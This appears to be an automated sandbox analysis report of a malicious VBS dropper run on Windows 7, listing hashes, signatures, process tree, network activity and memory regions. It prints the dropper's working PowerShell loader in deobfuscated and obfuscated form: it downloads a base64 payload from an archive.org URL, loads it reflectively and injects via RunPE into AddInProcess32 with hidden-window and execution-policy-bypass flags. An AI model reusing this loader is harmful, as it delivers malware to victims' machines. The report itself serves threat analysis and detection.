Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/10/2024, 01:35 UTC

General

  • Target

    6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs

  • Size

    504KB

  • MD5

    73116ddf40456b41c6b35023bc02e781

  • SHA1

    037b869900d0474bf7603b8fbe3401f517f52117

  • SHA256

    6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a

  • SHA512

    f60cbe6234371aacd3f42f87db8ea04cc3b982d9c356db5a1e0fa3959268c0aa8e78e4c059feac1619348a3453e55c3386e096812d2a4a6d61aca5cc99007be3

  • SSDEEP

    12288:VS57Wp1MYi6qsGrA2OGLmeq0wM/l1d0FUvoExHRbb4XJb7q5cPT+EmJu6X:VC6X0T5VnpJ4Za

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
"$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt';$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('txt.xtym/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"|invoke-expression
3
4
# powershell snippet 1
5
$url = "https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt"
6
$base64content = (new-object system.net.webclient).downloadstring("https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt")
7
$binarycontent = [system.convert]::frombase64string($base64content)
8
$assembly = [reflection.assembly]::load($binarycontent)
9
$type = $assembly.gettype("RunPE.Home")
10
$method = $type.getmethod("VAI")
11
$method.invoke($null, [object[]]"txt.xtym/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth", "desativado", "desativado", "desativado", "AddInProcess32", "")
12
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsICcrJz0gJysneycrJzB9JysnaHR0cHMnKyc6Ly9pYTYnKycwMCcrJzEwMCcrJy51cy5hJysncmNoaXYnKydlLm9yZycrJy8yNC9pJysndGUnKydtcy9kZXRhaC0nKydubycrJ3RlLScrJ3YvRGV0YWhOb3RlJysnVicrJy50JysneCcrJ3R7MH07ezF9YmFzZScrJzYnKyc0Q29udGVuJysndCA9JysnIChOZScrJ3ctJysnT2InKydqJysnZScrJ2N0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQ2xpZW50KS5Eb3dubG9hZFN0cmluZyh7MScrJ311cmwpO3sxJysnfScrJ2InKydpbicrJ2FyeScrJ0NvbnRlbnQgPScrJyBbU3lzdCcrJ2UnKydtJysnLkNvbnZlcnRdJysnOjonKydGcm9tQicrJ2FzZTY0JysnU3QnKydyaW5nKCcrJ3sxJysnfWJhJysnc2U2NENvbicrJ3RlJysnbnQpOycrJ3sxJysnfWFzc2UnKydtYmx5ID0gW1JlZmxlY3QnKydpbycrJ24nKycuQScrJ3NzZW1ibHknKyddJysnOjpMb2FkKHsxfWJpbmFyeScrJ0MnKydvJysnbicrJ3QnKydlJysnbnQpO3sxfXR5JysncGUnKycgPScrJyB7MX1hJysnc3MnKydlJysnbWJseS5HJysnZXRUeXBlJysnKHswfVJ1blBFLicrJ0hvbWV7MH0pOycrJ3sxJysnfScrJ20nKydldGhvZCA9JysnIHsxfXR5cGUuRycrJ2V0JysnTWUnKyd0JysnaG9kKCcrJ3swfVZBSXsnKycwfScrJyk7ezF9bWV0aG9kLicrJ0ludicrJ29rJysnZSh7JysnMScrJ31udScrJ2xsLCBbbycrJ2JqZWMnKyd0JysnWycrJ11dJysnQCh7MH10eCcrJ3QueHR5bS92ZWQuJysnMicrJ3IuMzliMzQnKyc1MzAnKycyYScrJzA3JysnNWIxYmMwZDQnKyc1YjYzMmViOWVlNjInKyctYicrJ3UnKydwJysnLy86cycrJ3B0dCcrJ2h7MCcrJ30gLCcrJyAnKyd7MCcrJ31kZXNhdGl2YWRvezB9ICcrJywgezB9ZGVzYXQnKydpdmEnKydkb3snKycwJysnfScrJyAsIHswfWQnKydlc2F0JysnaScrJ3ZhJysnZG97MH0sezB9QScrJ2RkSScrJ25Qcm9jZScrJ3NzMycrJzJ7MH0sJysnezAnKyd9JysnezAnKyd9KScrJyknKSAtRiAgW2NIYXJdMzksW2NIYXJdMzYpIHwgLiAoKEdWICcqbWRSKicpLm5hbWVbMywxMSwyXS1Kb2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url '+'= '+'{'+'0}'+'https'+'://ia6'+'00'+'100'+'.us.a'+'rchiv'+'e.org'+'/24/i'+'te'+'ms/detah-'+'no'+'te-'+'v/DetahNote'+'V'+'.t'+'x'+'t{0};{1}base'+'6'+'4Conten'+'t ='+' (Ne'+'w-'+'Ob'+'j'+'e'+'ct System.N'+'e'+'t'+'.Web'+'Client).DownloadString({1'+'}url);{1'+'}'+'b'+'in'+'ary'+'Content ='+' [Syst'+'e'+'m'+'.Convert]'+'::'+'FromB'+'ase64'+'St'+'ring('+'{1'+'}ba'+'se64Con'+'te'+'nt);'+'{1'+'}asse'+'mbly = [Reflect'+'io'+'n'+'.A'+'ssembly'+']'+'::Load({1}binary'+'C'+'o'+'n'+'t'+'e'+'nt);{1}ty'+'pe'+' ='+' {1}a'+'ss'+'e'+'mbly.G'+'etType'+'({0}RunPE.'+'Home{0});'+'{1'+'}'+'m'+'ethod ='+' {1}type.G'+'et'+'Me'+'t'+'hod('+'{0}VAI{'+'0}'+');{1}method.'+'Inv'+'ok'+'e({'+'1'+'}nu'+'ll, [o'+'bjec'+'t'+'['+']]'+'@({0}tx'+'t.xtym/ved.'+'2'+'r.39b34'+'530'+'2a'+'07'+'5b1bc0d4'+'5b632eb9ee62'+'-b'+'u'+'p'+'//:s'+'ptt'+'h{0'+'} ,'+' '+'{0'+'}desativado{0} '+', {0}desat'+'iva'+'do{'+'0'+'}'+' , {0}d'+'esat'+'i'+'va'+'do{0},{0}A'+'ddI'+'nProce'+'ss3'+'2{0},'+'{0'+'}'+'{0'+'})'+')') -F [cHar]39,[cHar]36) | . ((GV '*mdR*').name[3,11,2]-Join'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:536

Network

  • flag-us
    DNS
    ia600100.us.archive.org
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    ia600100.us.archive.org
    IN A
    Response
    ia600100.us.archive.org
    IN A
    207.241.227.240
  • 207.241.227.240:443
    ia600100.us.archive.org
    tls
    powershell.exe
    357 B
    219 B
    5
    5
  • 207.241.227.240:443
    ia600100.us.archive.org
    tls
    powershell.exe
    449 B
    259 B
    7
    6
  • 8.8.8.8:53
    ia600100.us.archive.org
    dns
    powershell.exe
    69 B
    85 B
    1
    1

    DNS Request

    ia600100.us.archive.org

    DNS Response

    207.241.227.240

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UFYWR635IES33XBQGEZW.temp

    Filesize

    7KB

    MD5

    48edfe5248b4000c2b16546372f67f45

    SHA1

    590e9fedf0c5ae68334123ac2a8d95c83ba877df

    SHA256

    04a11776d3d467907b48b797eb680272181bdf7c589942c86a663a95b630383b

    SHA512

    1f2fd91cc70a474095f3f0708572c2de487ac2312965b71a9e50b8e26834c9cc87e2beb764d7cfdab0e541df32a97c10940bcb03f22a2baeb1e00aba60098967

  • memory/3068-4-0x000007FEF59DE000-0x000007FEF59DF000-memory.dmp

    Filesize

    4KB

  • memory/3068-5-0x000000001B580000-0x000000001B862000-memory.dmp

    Filesize

    2.9MB

  • memory/3068-6-0x0000000002000000-0x0000000002008000-memory.dmp

    Filesize

    32KB

  • memory/3068-7-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

    Filesize

    9.6MB

  • memory/3068-8-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

    Filesize

    9.6MB

  • memory/3068-9-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

    Filesize

    9.6MB

  • memory/3068-10-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

    Filesize

    9.6MB

  • memory/3068-11-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

    Filesize

    9.6MB

  • memory/3068-17-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

    Filesize

    9.6MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.